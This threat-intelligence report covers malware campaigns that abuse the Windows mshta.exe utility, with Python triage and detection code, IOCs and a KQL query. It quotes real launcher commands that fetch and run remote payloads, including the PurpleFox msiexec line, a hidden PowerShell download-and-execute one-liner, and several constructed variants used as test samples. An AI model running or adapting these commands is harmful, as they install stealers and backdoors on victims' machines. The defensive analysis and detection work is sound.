MSHTA: The Retired Windows Tool Still Running Malware

Executive Summary
A Windows utility most people assume died with Internet Explorer is quietly
powering live malware campaigns. Bitdefender reports that since the start of
2026, detections of mshta.exe — the Microsoft HTML Application Host — have
risen sharply, and because legitimate use of the tool is fading, that trend
reflects malicious abuse, not renewed admin adoption.
The appeal is simple: MSHTA is Microsoft-signed, present by default, and runs VBScript/JavaScript in memory, letting attackers pull remote payloads and hand off to PowerShell or msiexec while leaving almost nothing on disk. Bitdefender observed it across the full threat spectrum — commodity stealers (LummaStealer, Amatera via CountLoader and Emmenhtal Loader), crypto-clipboard malware (ClipBanker), and the long-lived, rootkit-enabled PurpleFox.
For an enterprise, the business risk is that a single click on a fake "free software" download or a fake CAPTCHA prompt can launch a trusted, signed binary that ends in credential theft, financial fraud, or persistent compromise — with signature-based controls none the wiser.
The single most important action: restrict or block mshta.exe (and
wscript.exe) where they are not needed, and alert on mshta.exe command lines
that contain a URL or spawn PowerShell/msiexec.
Background — Why MSHTA Is an Attractive LOLBIN
mshta.exe runs HTML Applications (.hta) — programs written in HTML plus
VBScript or JavaScript — using the legacy Internet Explorer rendering engine.
Although IE reached end of support on 15 June 2022, the engine survives in Edge's
IE mode (supported at least until 2029), and MSHTA itself ships enabled by
default on current Windows.
Living-off-the-Land binaries (LOLBINs) are attractive precisely because they are signed, familiar, and implicitly trusted. MSHTA fits the model cleanly: it can execute script content in-memory, retrieve content from remote locations, and run under a legitimate Microsoft-signed process — ideal for stagers and loaders that want to minimize on-disk artifacts.
A note on direction of travel: Microsoft began deprecating VBScript in the second half of 2024 (now a Feature on Demand, still enabled by default), plans to disable it by default in 2027, and intends to remove it eventually. There is, however, no public plan to remove MSHTA. As long as it ships by default, it remains both a residual admin tool and exposed attack surface.
Roughly 10% of Bitdefender's MSHTA telemetry is still benign — one-liner
javascript:alert() / vbscript:msgbox() admin notifications and simple login
scripts. That residual legitimate use is exactly what makes blunt blocking risky
and behavioral detection necessary.
Campaign Roundup — How MSHTA Gets Abused
Across campaigns, MSHTA plays the same role: a built-in, signed utility that fetches and executes remote script content at the initial or intermediate stage, then hands off to PowerShell, WScript, msiexec, or a final payload.
1. CountLoader → LummaStealer / Amatera
The largest cluster in Bitdefender's telemetry used CountLoader, an HTA-based
loader delivering the stealers LummaStealer and Amatera. Most detections
showed mshta.exe command lines pointing at domains that imitate legitimate
services on the .cc TLD (e.g. google-services[.]cc,
memory-scanner[.]cc). The campaign gained traction in late 2025, peaked at
the end of January 2026, then declined as operators shifted hosting; from late
February 2026 a new pattern moved to .vg/.gl domains
(explorer[.]vg, ccleaner[.]gl, microservice[.]gl).
The lure is cracked/free software pushed via messages, social posts, or
SEO-poisoned sites. The downloaded archive ships a Setup.exe that is actually a
legitimate Python interpreter, alongside genuine python3XX.dll files. At
runtime, dependency resolution pulls in a malicious script at
.\Lib\encodings\aliases.py, which launches a renamed MSHTA (iso2022.exe)
to contact C2 and retrieve the HTA loader. The resulting command line resembles:
cd Lib\encodings && iso2022.exe https:\\planetitude[.]org/wp-admin/chellenge/stats.location & iso2022[.]exe https:\\alpha-centavr[.]cc
2. Emmenhtal Loader (ClickFix)
The Emmenhtal Loader chain leans on ClickFix social engineering. It
begins with Discord phishing links to fake human-verification pages
(reCAPTCHA-style, on hosts like humancheck[.]shop). JavaScript silently copies
a malicious command to the clipboard; the user is told to press Win + R,
Ctrl + V, Enter — so explorer.exe launches mshta.exe against a remote
".mp4" that is really an HTA.
flowchart TD
A["Discord phishing link"] --> B["Fake reCAPTCHA page<br/>(humancheck[.]shop)"]
B -->|JS copies cmd to clipboard| C["User: Win+R → Ctrl+V → Enter"]
C --> D["explorer.exe → mshta.exe<br/>remote .mp4 = HTA (in-memory)"]
D -->|1x1px, hidden window| E["JS Base64 decoder → eval"]
E --> F["WScript.Shell runs PowerShell<br/>-w hidden -ep bypass"]
F --> G["AMSI bypass (patch clr.dll)<br/>+ load .NET assembly"]
G --> H["LummaStealer"]
The HTA is bloated with garbage data, sets its window to 1×1 pixel / hidden,
and is executed directly in memory (never written to disk). An embedded
Base64 routine decodes and evals a second-stage loader, which spawns a
WScript.Shell and runs a hidden PowerShell one-liner that downloads and
executes a script in memory:
powershell -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('hxxps://klipdiheqoe[.]shop/ruwkl[.]png'))"
The final PowerShell performs an AMSI bypass (patching clr.dll, lifted from
a public GitHub repo), then Base64-decodes and reflectively loads a .NET assembly
— in the analyzed case, a known LummaStealer assembly
(1E0E375F...85B7C84).
3. ClipBanker
Here MSHTA fetches a remote HTA (e.g. asd.s7610rir[.]pw/win/checking[.]hta) that
hides its window off-screen (moveTo -2000,-2000), creates a WScript.Shell,
and runs a Base64 PowerShell command. That stage pulls checking.ps1
(333E2192...), which sets Windows Defender exclusions and persistence via a
scheduled task masquerading as a legitimate service (e.g. "Optimize Start
Menu Cache Files-S-3-5-21-…"), then drops the ClipBanker downloader
(ichigo-lite.ps1). A cleanup script (del.ps1) removes traces and kills
analysis tools like Procmon and Autoruns. ClipBanker's goal: swap
cryptocurrency wallet addresses in the victim's clipboard.
4. PowerShell-via-MSHTA obfuscation variants
Smaller clusters use MSHTA purely to spawn obfuscated PowerShell, with per-campaign tricks to dodge EDR/SIEM keyword alerts:
- XWorm / Danabot — the URL looks like an image (.jpg) but serves PowerShell that runs in memory; PowerShell keywords are split into tokens ((New-Object Net.We+bClient).Downlo…) or padded with junk characters that are stripped at runtime via String.Replace.
- Lalala stealer — the script is only served if the POST request includes a predefined password (iwr ... -method post -body <password>).
5. PurpleFox — even advanced threats use MSHTA
PurpleFox (active since 2018, still live in 2026) is a rootkit-enabled
backdoor. One delivery method has stayed consistent: launch msiexec from an
MSHTA command line to download and run an MSI disguised as a .png:
mshta.exe vbscript:createobject("wscript.shell").run("Cmd /c for /d %i in (195[.]189[.]28[.]244:17807 103[.]124[.]106[.]194:18413 58[.]221[.]59[.]20:17256 ) do Msiexec /i http://%i/3EBCE3A4.Png /Q",0)(window.close)
flowchart LR
A["mshta.exe (vbscript:)"] --> B["msiexec /i http://IP/file.Png /Q"]
B --> C["MSI (disguised .png)<br/>rootkit-enabled backdoor"]
C --> D["Persistence + C2 commands<br/>info theft · surveillance · DDoS"]
C --> E["Worm: scan port 445<br/>SMB brute-force"]
E -->|infect| F["New Windows hosts"]
F --> E
Once installed, PurpleFox provides persistence and on-demand C2 execution, and supports info theft, surveillance, and DDoS. Its worm side (Guardicore, 2021) propagates by scanning port 445 and brute-forcing SMB — a campaign that saw a ~600% spike in May 2020 (≈90,000 attacks) and abused compromised, outdated IIS servers to host its payloads. The rootkit hides files and registry keys, and the malware blocks ports 445/139/135 to prevent reinfection.
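The obfuscation tricks in section 4 and the single-line PurpleFox launcher above are easier to reason about with a triage routine that pulls them apart. The following Python is an added example written for this page, not Bitdefender's tooling: it refangs a command line, resolves the for /d %i host list into concrete URLs, undoes the 'Net.We'+'bClient' splitting and .Replace() padding so keyword matching works again, and decodes a -EncodedCommand payload. The PurpleFox, Emmenhtal and CountLoader lines are the page's own; the XWorm-style, password-gated and -enc lines, and every 203.0.113.x / 198.51.100.x address, are constructed for the example.

```python
"""Triage of the command lines quoted on this page (added example, not Bitdefender's tooling).

triage(cmdline) reports:
  vector       how script reaches MSHTA: a remote URL or an inline vbscript:/javascript: handler
  urls         every URL, with a cmd.exe `for /d %i in (...)` loop expanded host by host
  spawns       follow-on LOLBINs named on the line (msiexec, powershell, cmd, wscript, ...)
  hidden       window-hiding tricks the chains use (-w hidden, moveTo(-2000,...), window.close)
  keywords_*   PowerShell keywords found before/after undoing 'Net.We'+'bClient' splitting
               and ("Dow#nl#oad").Replace('#','') padding (the section 4 tricks)
  encoded      a decoded -EncodedCommand payload (UTF-16LE Base64), if present
PurpleFox/Emmenhtal/CountLoader lines are from the page; the others are constructed.
"""
import base64
import re

URL_RE = re.compile(r"""(?i)\bhttps?:(?://|\\\\)[^\s'"(),]+""")   # also the https:\\ form in CountLoader
FOR_LOOP_RE = re.compile(r"(?i)\bfor\s+/d\s+(%\w+)\s+in\s*\(([^)]*)\)")
SPAWN_RE = re.compile(r"(?i)\b(powershell|pwsh|msiexec|wscript|cscript|cmd|rundll32|regsvr32)(?:\.exe)?\b(?!\.shell)")
HIDE_RE = re.compile(r"(?i)-w(?:indowstyle)?\s+hidden|moveto\s*\(?\s*-\d+|window\.close")
ENC_RE = re.compile(r"(?i)-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})")
GATED_RE = re.compile(r"(?i)-method\s+post\b")          # Lalala-style password-gated download
KEYWORDS = ("net.webclient", "downloadstring", "downloadfile", "invoke-webrequest", "iwr", "iex",
            "invoke-expression", "frombase64string", "-ep bypass", "-executionpolicy bypass")


def refang(s):
    return s.replace("[.]", ".").replace("[://]", "://").replace("hxxp", "http")


def normalize(cmd):
    """Undo 'Net.We'+'bClient' concatenation and ('Dow#nl#oad').Replace('#','') padding."""
    s = re.sub(r"""(['"])\s*\+\s*\1""", "", cmd)   # drop quote-plus-quote between string pieces
    pat = re.compile(r"""\(\s*(['"])([^'"]*)\1\s*\)\s*\.replace\(\s*(['"])([^'"]*)\3\s*,\s*(['"])([^'"]*)\5\s*\)""", re.I)
    return pat.sub(lambda m: m.group(1) + m.group(2).replace(m.group(4), m.group(6)) + m.group(1), s)


def keywords_in(s):
    low = s.lower()
    return [k for k in KEYWORDS if k in low]


def decode_encoded_command(cmd):
    m = ENC_RE.search(cmd)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except ValueError:            # binascii.Error and UnicodeDecodeError both subclass ValueError
        return None


def triage(cmdline):
    c = refang(cmdline)
    low = c.lower()
    urls = [u.replace("\\\\", "//") for u in URL_RE.findall(c)]
    for m in FOR_LOOP_RE.finditer(c):           # expand http://%i/... against the for-loop host list
        var, hosts = m.group(1), m.group(2).split()
        urls = [u for u in urls if var not in u] + [u.replace(var, h) for u in urls if var in u for h in hosts]
    encoded = decode_encoded_command(c)
    if encoded:
        urls += URL_RE.findall(encoded)
    if "vbscript:" in low:
        vector = "inline vbscript:"
    elif "javascript:" in low:
        vector = "inline javascript:"
    else:
        vector = "remote url" if urls else "local/none"
    return {
        "vector": vector,
        "urls": urls,
        "spawns": sorted({m.group(1).lower() for m in SPAWN_RE.finditer(c)}),
        "hidden": bool(HIDE_RE.search(c)),
        "gated_download": bool(GATED_RE.search(c)),
        "keywords_raw": keywords_in(c),
        "keywords_normalized": keywords_in(normalize(c) + " " + (encoded or "")),
        "encoded": encoded,
    }


SAMPLES = {
    "purplefox": 'mshta.exe vbscript:createobject("wscript.shell").run("Cmd /c for /d %i in (195[.]189[.]28[.]244:17807 103[.]124[.]106[.]194:18413 58[.]221[.]59[.]20:17256 ) do Msiexec /i http://%i/3EBCE3A4.Png /Q",0)(window.close)',
    "emmenhtal": '''powershell -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('hxxps://klipdiheqoe[.]shop/ruwkl[.]png'))"''',
    "countloader": r"cd Lib\encodings && iso2022.exe https:\\planetitude[.]org/wp-admin/chellenge/stats.location & iso2022[.]exe https:\\alpha-centavr[.]cc",
    # constructed: split and padded keywords in the XWorm / Danabot style (documentation address)
    "xworm_style": r'''powershell -nop -w hidden -c "iex ((New-Object ('Net.We'+'bClient')).(('Dow#nl#oad#Str#ing').Replace('#',''))('http://203.0.113.10/img/photo.jpg'))"''',
    # constructed: password-gated download in the Lalala style
    "lalala_style": '''powershell -c "iwr http://203.0.113.44/l.php -Method POST -Body 'p4ss' | iex"''',
}
ENC_PAYLOAD = "iex (iwr http://198.51.100.7/c.ps1 -UseBasicParsing)"   # constructed
SAMPLES["encoded"] = "powershell -nop -w hidden -enc " + base64.b64encode(ENC_PAYLOAD.encode("utf-16-le")).decode()

if __name__ == "__main__":
    for name, line in SAMPLES.items():
        print(name, triage(line))
```

The keywords_raw versus keywords_normalized fields are the point of the XWorm-style sample: a keyword-based alert sees only iex on the raw line and sees net.webclient and downloadstring only after the concatenation and Replace() padding are undone, which is why the SIEM rule has to run on a normalized command line, or on lineage, rather than on literal strings.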
Not always malicious
Not every MSHTA execution is an attack. A meaningful share of detections came
from DriverPack, whose updater uses a scheduled task to run an in-memory HTA
to check for updates. It is not inherently malicious (though some components are
flagged PUA) — a useful reminder to tune for behavior, not for mshta.exe alone.
MITRE ATT&CK Mapping
Analyst mapping derived from the reporting; not an official vendor layer.
| Tactic | Technique | ID |
|---|---|---|
| Defense Evasion | System Binary Proxy Execution: Mshta | T1218.005 |
| Defense Evasion | System Binary Proxy Execution: Msiexec | T1218.007 |
| Execution | Command & Scripting: PowerShell | T1059.001 |
| Execution | Command & Scripting: Visual Basic | T1059.005 |
| Execution | Command & Scripting: JavaScript | T1059.007 |
| Initial Access | Phishing | T1566 |
| Execution | User Execution (incl. ClickFix paste-run) | T1204 |
| Command & Control | Ingress Tool Transfer | T1105 |
| Defense Evasion | Obfuscated Files or Information | T1027 |
| Defense Evasion | Deobfuscate/Decode Files or Information | T1140 |
| Defense Evasion | Reflective Code Loading | T1620 |
| Defense Evasion | Impair Defenses (AMSI bypass, Defender exclusions) | T1562.001 |
| Persistence | Scheduled Task/Job | T1053.005 |
| Defense Evasion | Rootkit | T1014 |
| Collection | Clipboard Data (ClipBanker) | T1115 |
| Lateral Movement | Remote Services: SMB (PurpleFox worm) | T1021.002 |
| Credential Access | Brute Force (SMB) | T1110 |
| Defense Evasion | Indicator Removal (cleanup script) | T1070 |
Selected IOCs
Selected for readability — the full IOC set is in the Bitdefender report (see References).
# === Hashes (SHA-256) ===
1E0E375F3EE82D5AF5DFE6F7DF0E2FAC9A7D37C67ADD3390D05A93AFD85B7C84 LummaStealer payload (Emmenhtal)
333E2192F2551415659FB4094E81B911708921BB588EECF65E27F51C9938DFC2 ClipBanker checking.ps1
38FE562136ADE372FC4CEDDE67826AEEA8404E93A54A4A4736DDB4C8C8D4C96D ClipBanker ichigo-lite.ps1
7D0487AFC91B0FE8B2FBF732AB54C3C07E86BF69471BBA6C283AABEA190499BA ClipBanker del.ps1 (cleanup)
# === CountLoader / LummaStealer domains (representative) ===
google-services[.]cc · memory-scanner[.]cc · alpha-centavr[.]cc
explorer[.]vg · ccleaner[.]gl · microservice[.]gl (newer .vg/.gl pattern)
# === Emmenhtal URLs (representative) ===
hxxps[://]buck2nd[.]oss-eu-central-1[.]aliyuncs[.]com/dir/sixth/singl6[.]mp4
hxxp[://]92[.]255[.]57[.]155/Capcha[.]html
hxxps[://]klipdiheqoe[.]shop/ruwkl[.]png (PowerShell stage)
# === ClipBanker ===
185[.]208[.]159[.]199 hosts checking.ps1
87[.]96[.]21[.]84 hosts follow-on payloads
hxxps[://]asd[.]s7610rir[.]pw/win/checking[.]hta
# === PurpleFox .msi hosts (representative) ===
195[.]189[.]28[.]244 · 103[.]124[.]106[.]194 · 58[.]221[.]59[.]20
89[.]117[.]2[.]159 · 107[.]175[.]187[.]11
# === Host-based patterns ===
iso2022.exe renamed mshta.exe (CountLoader)
mshta.exe spawning powershell.exe / msiexec.exe / wscript.exe
mshta.exe command line containing http(s):// or vbscript:/javascript:
parent explorer.exe → mshta.exe (ClickFix paste-and-run)
Scheduled task names imitating Windows services
Detection for SOC
The reliable signal is not a single file but the command-line shape and
process lineage of mshta.exe. Starting point (Microsoft Sentinel / Defender
KQL):
DeviceProcessEvents
| where FileName =~ "mshta.exe"
    or ProcessVersionInfoOriginalFileName =~ "mshta.exe"   // renamed copies such as iso2022.exe
| where ProcessCommandLine has_any ("http", "https", "vbscript", "javascript")   // term match, so the https:\\ form is caught too
    or InitiatingProcessFileName =~ "explorer.exe"   // ClickFix paste-and-run
| project Timestamp, DeviceName, AccountName, FileName, InitiatingProcessFileName, ProcessCommandLine
Pair it with a lineage hunt for mshta.exe spawning powershell.exe,
msiexec.exe, or wscript.exe, and flag any renamed MSHTA (a binary other
than mshta.exe whose original filename / signature resolves to the MS HTML
Application Host).
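As an added example (not the page's or any vendor's code), the same logic applied in Python to a constructed window of DeviceProcessEvents-shaped records, including the two follow-ups the text asks for: renamed copies matched through the PE original filename, and child processes linked to an mshta ancestor by process id across up to three generations rather than by parent name alone, so an msiexec launched through an intermediate cmd.exe is still attributed to MSHTA. It also carves out the benign alert()/msgbox() one-liner as informational. Hostnames, process ids and the 203.0.113.0/24 addresses are constructed.

```python
"""Lineage-based mshta.exe detection over DeviceProcessEvents-shaped records (added example;
not part of the page or of any vendor rule set). Field names mirror Defender's
DeviceProcessEvents table; the events, hosts and URLs are constructed for the example.
"""
import re

URL_RE = re.compile(r"(?i)\bhttps?:")                       # matches https:// and the https:\\ form
HANDLER_RE = re.compile(r"(?i)\b(?:vbscript|javascript):")
RISKY_RE = re.compile(r"(?i)createobject|getobject|activexobject|wscript\.shell|shell\.application|\.run\(|\beval\(|\bexecute\b")
LOLBIN_CHILDREN = {"powershell.exe", "pwsh.exe", "msiexec.exe", "wscript.exe", "cscript.exe", "cmd.exe"}
SEVERITY = {3: "high", 2: "medium", 0: "info"}


def is_mshta(ev):
    """Match on process name or on the PE version-info original filename (catches iso2022.exe-style renames)."""
    return ev["FileName"].lower() == "mshta.exe" or ev.get("ProcessVersionInfoOriginalFileName", "").lower() == "mshta.exe"


def mshta_ancestor(ev, by_pid, depth=3):
    """Walk up to `depth` parents; return the chain of parent names ending at an mshta process, else None."""
    chain, cur = [], ev
    for _ in range(depth):
        parent = by_pid.get((cur["DeviceName"], cur["InitiatingProcessId"]))
        if parent is None:   # parent outside the event window: only the recorded parent name is available
            return chain + [cur["InitiatingProcessFileName"]] if cur["InitiatingProcessFileName"].lower() == "mshta.exe" else None
        chain.append(parent["FileName"])
        if is_mshta(parent):
            return chain
        cur = parent
    return None


def detect(events):
    by_pid = {(e["DeviceName"], e["ProcessId"]): e for e in events}
    findings = []
    for e in events:
        cmd, parent, hits = e["ProcessCommandLine"], e["InitiatingProcessFileName"].lower(), []   # hits: (reason, level)
        if is_mshta(e):
            if e["FileName"].lower() != "mshta.exe":
                hits.append(("renamed mshta.exe (original filename MSHTA.EXE)", 3))
            if URL_RE.search(cmd):
                hits.append(("remote URL on the command line", 3))
            if HANDLER_RE.search(cmd):
                if RISKY_RE.search(cmd):
                    hits.append(("inline vbscript:/javascript: that creates objects or runs commands", 2))
                elif not hits:
                    hits.append(("inline alert()/msgbox() one-liner (benign admin pattern, review only)", 0))
            if parent == "explorer.exe":
                hits.append(("launched from explorer.exe (ClickFix Win+R paste-and-run)", 2))
        elif e["FileName"].lower() in LOLBIN_CHILDREN:
            chain = mshta_ancestor(e, by_pid)
            if chain:
                hits.append((f"{e['FileName']} descends from mshta ({' <- '.join(chain)})", 3))
        if hits:
            findings.append({"device": e["DeviceName"], "pid": e["ProcessId"], "process": e["FileName"],
                             "severity": SEVERITY[max(level for _, level in hits)],
                             "reasons": [reason for reason, _ in hits]})
    return findings


def ev(device, pid, name, orig, cmd, parent, ppid):
    return {"DeviceName": device, "ProcessId": pid, "FileName": name, "ProcessVersionInfoOriginalFileName": orig,
            "ProcessCommandLine": cmd, "InitiatingProcessFileName": parent, "InitiatingProcessId": ppid}


EVENTS = [  # constructed sample window; process ids are local to the sample
    ev("ws01", 4120, "mshta.exe", "MSHTA.EXE", "mshta https://203.0.113.5/verify.mp4", "explorer.exe", 1560),
    ev("ws01", 4188, "powershell.exe", "PowerShell.EXE", "powershell -w hidden -ep bypass -nop -Command iex(...)", "mshta.exe", 4120),
    ev("ws02", 5012, "iso2022.exe", "MSHTA.EXE", r"iso2022.exe https:\\203.0.113.9/wp-admin/stats.location", "Setup.exe", 4990),
    ev("ws03", 3300, "mshta.exe", "MSHTA.EXE", 'mshta.exe javascript:alert("Maintenance window 18:00")(window.close)', "cmd.exe", 3100),
    ev("ws04", 2200, "mshta.exe", "MSHTA.EXE", 'mshta.exe vbscript:createobject("wscript.shell").run("Cmd /c Msiexec /i http://203.0.113.77/3EBCE3A4.Png /Q",0)(window.close)', "cmd.exe", 2100),
    ev("ws04", 2210, "cmd.exe", "Cmd.Exe", "Cmd /c Msiexec /i http://203.0.113.77/3EBCE3A4.Png /Q", "mshta.exe", 2200),
    ev("ws04", 2244, "msiexec.exe", "msiexec.exe", "Msiexec /i http://203.0.113.77/3EBCE3A4.Png /Q", "cmd.exe", 2210),
]

if __name__ == "__main__":
    for f in detect(EVENTS):
        print(f["severity"].upper(), f["device"], f["pid"], f["process"], "|", "; ".join(f["reasons"]))
```

Keying the parent lookup on (DeviceName, ProcessId) rather than on InitiatingProcessFileName is what keeps the msiexec on ws04 attributed to MSHTA even though its immediate parent is cmd.exe; the fallback to the recorded parent name only applies when the parent event has aged out of the window.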
Recommendations (concise)
- Block or restrict mshta.exe and wscript.exe where they are not needed for business workflows; block .hta execution via Group Policy / application control (WDAC / AppLocker). Inventory the residual legitimate use first (roughly 10% of Bitdefender's telemetry), and remember that a path rule does not stop a renamed copy such as iso2022.exe; the original-filename check in the detection section above does.
- Enable ASR rules (the script-related rules such as "Block JavaScript or VBScript from launching downloaded executable content") and behavioral (not signature-only) detection; alert on the command-line and lineage patterns above.
- User awareness on ClickFix — never paste-and-run commands from a "human verification" prompt (Win+R lure); avoid cracked/"free" software downloads.
- Migrate legacy admin scripts off MSHTA/VBScript ahead of the 2027 VBScript default-off change.